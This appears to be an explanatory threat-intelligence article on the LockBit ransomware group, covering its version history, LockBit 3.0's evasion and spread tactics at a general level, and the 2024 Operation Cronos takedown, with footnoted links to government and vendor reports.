Lockbit is a notorious ransomware group known for its aggressive and sophisticated attacks. Originating in 2019, this group has rapidly become a significant threat, targeting corporations and government entities worldwide.
They organize their operations meticulously, establishing themselves as formidable threat actors in cyberspace.
Who is Lockbit?
Lockbit is a cybercriminal group engaged in deploying ransomware attacks.
They are responsible for numerous high-profile cybersecurity breaches, impacting businesses across various sectors.
The group operates on a ransomware-as-a-service (RaaS) model, allowing affiliates1 to use their ransomware in exchange for a cut of the ransom payments. This structure has rapidly expanded their reach and impact.
How Does Lockbit Operate?
Initially, they gain access to a victim’s network through methods like phishing, exploiting vulnerabilities, or purchasing access from other criminals. Once inside, they move laterally across the network, identifying and encrypting valuable data.
The ransomware presents victims with a ransom note demanding payment for data decryption.
Lockbit evolution
The LockBit ransomware family has undergone a remarkable evolution since its initial emergence, demonstrating the adaptability and increasing sophistication of cyber threats.
Here’s a timeline outlining the major developments in the LockBit ransomware lineage:
September 2019: ABCD Ransomware Emergence
LockBit’s roots can be traced back to the appearance of ABCD ransomware. This ransomware laid the foundational code for future iterations of LockBit.
January 2020: LockBit Emergence
Discussions regarding a ransomware explicitly named “LockBit” began to surface on Russian-language cybercrime forums, marking the official introduction of this threatening malware into the cybercrime ecosystem.
June 2021: LockBit 2.0 (LockBit Red) Launch
LockBit evolved into its second major version, introducing StealBit, a tool designed for exfiltrating information before encryption, enhancing the double extortion threat.
October 2021: Linux-ESXi Locker Version 1.0 Release
LockBit expanded its attack vectors by developing a version capable of targeting Linux and VMware ESXi systems2, thereby broadening its potential victim base.
March 2022: LockBit 2.0 Bugs Discovered
Identifying critical vulnerabilities in LockBit 2.0 prompted the developers to work on an updated version to address these flaws.
June 2022: LockBit 3.0 (LockBit Black) Debut
LockBit Black, the third iteration, addressed the issues identified in LockBit 2.0. It was launched, showing influences from BlackMatter and Alphv ransomware, and showcasing improved evasion capabilities.
September 2022: Builder Leak
LockBit faced a setback as the builder for LockBit 3.0 was leaked3, allowing non-affiliated cybercriminals access to the ransomware, which potentially led to a wider spread of the malware.
January 2023: LockBit Green Introduction
This version marked the integration of source code4 from Conti ransomware, indicating a trend of ransomware groups borrowing from each other to enhance their malicious toolsets.
April 2023: macOS Targeting
A significant development in LockBit’s capabilities was observed with the malware now targeting macOS systems5, reflecting the continuous expansion of its target spectrum.
LockBit 3.0: Enhanced Evasiveness and Modularity
What sets LockBit 3.0 apart is its customizable nature; it allows for a multitude of behaviors tailored at the compilation stage6, which can be further fine-tuned through command-line arguments upon execution.
This feature enables specific functionalities like intricate lateral movements and the initiation of Safe Mode during attacks.
A standout feature is its execution conditions. These include a mandatory password for affiliates who lack direct access to the ransomware.
This password acts as a cryptographic key. It renders the malware inactive and indecipherable without the correct input. This complicates detection and analysis by cybersecurity defenses.
The encrypted nature of the executable ensures that traditional signature-based detections are less effective. This occurs because each instance of the malware generates a unique cryptographic hash.
Moreover, it exhibits selectiveness in its targets based on system language settings. It avoids systems with languages from a predefined exclusion list, such as Romanian (Moldova), Arabic (Syria), and Tatar (Russia).
This tactic likely aims to sidestep systems in certain geographical regions. It reflects a strategic choice to avoid attention from specific countries’ law enforcement agencies.
Tactics for Initial Access and Spread
LockBit 3.0’s strategies for infiltrating networks are diverse. They leverage vulnerabilities through remote desktop protocol (RDP) exploitation, phishing, valid account misuse, and public-facing application vulnerabilities.
Once inside, the ransomware escalates privileges if necessary. It also conducts extensive reconnaissance to understand the environment fully before initiating its malicious activities.
The ransomware disrupts system operations by terminating relevant processes and services and manipulating system configurations to maintain control. It uses a mix of hardcoded credentials and compromised local accounts to spread through the network. It employs mechanisms like Group Policy Objects and PsExec in conjunction with the SMB protocol for efficient distribution.
Exfiltration and Encryption
Before locking files, LockBit 3.0 exfiltrates valuable data using tools such as Stealbit7 and rclone8. It uses publicly available services like MEGA, for data theft.
Operation Cronos
The operation, announced in February 20249, resulted in the seizure of LockBit’s infrastructure and the indictment of its members, marking a substantial blow to one of the most active ransomware groups worldwide.
Notably, this disruption has enabled the retrieval of decryption keys, offering a lifeline to the over 2,000 victims10 worldwide affected by LockBit’s ransom demands, which cumulatively ran into hundreds of millions of dollars.
The operation led to the arrest of two members in Poland and Ukraine, and the seizure of LockBit’s servers11.
Ivan Kondratyev12 and Artur Sungatov13, were charged with conspiring to commit LockBit powered ransomware attacks.
The indictment unveiled the identities of the alleged perpetrators, erasing the veil of anonymity associated with cyber attacks. It sends a resounding message14 that online actions leave a digital trail, with consequences awaiting those involved.
FAQs
- https://www.cisa.gov/sites/default/files/2023-06/aa23-165a_understanding_TA_LockBit_0.pdf ↩︎
- https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html ↩︎
- https://analyst1.com/ransomware-diaries-volume-1/ ↩︎
- https://cybernews.com/security/lockbit-ransomware-gang-releases-lockbit-green-version/ ↩︎
- https://www.wired.com/story/apple-mac-lockbit-ransomware-samples/ ↩︎
- https://www.cisa.gov/sites/default/files/2023-03/aa23-075a-stop-ransomware-lockbit.pdf ↩︎
- https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool ↩︎
- https://rclone.org/ ↩︎
- https://www.justice.gov/opa/pr/us-and-uk-disrupt-lockbit-ransomware-variant ↩︎
- https://www.aha.org/news/headline/2024-02-20-agencies-seize-lockbit-ransomware-servers-offer-encryption-keys ↩︎
- https://www.reuters.com/technology/cybersecurity/us-indicts-two-russian-nationals-lockbit-cybercrime-gang-bust-2024-02-20/ ↩︎
- https://www.justice.gov/usao-ndca/media/1338976/dl?inline ↩︎
- https://www.justice.gov/usao-nj/media/1338926/dl?inline ↩︎
- https://www.justice.gov/usao-nj/media/1338931/dl?inline ↩︎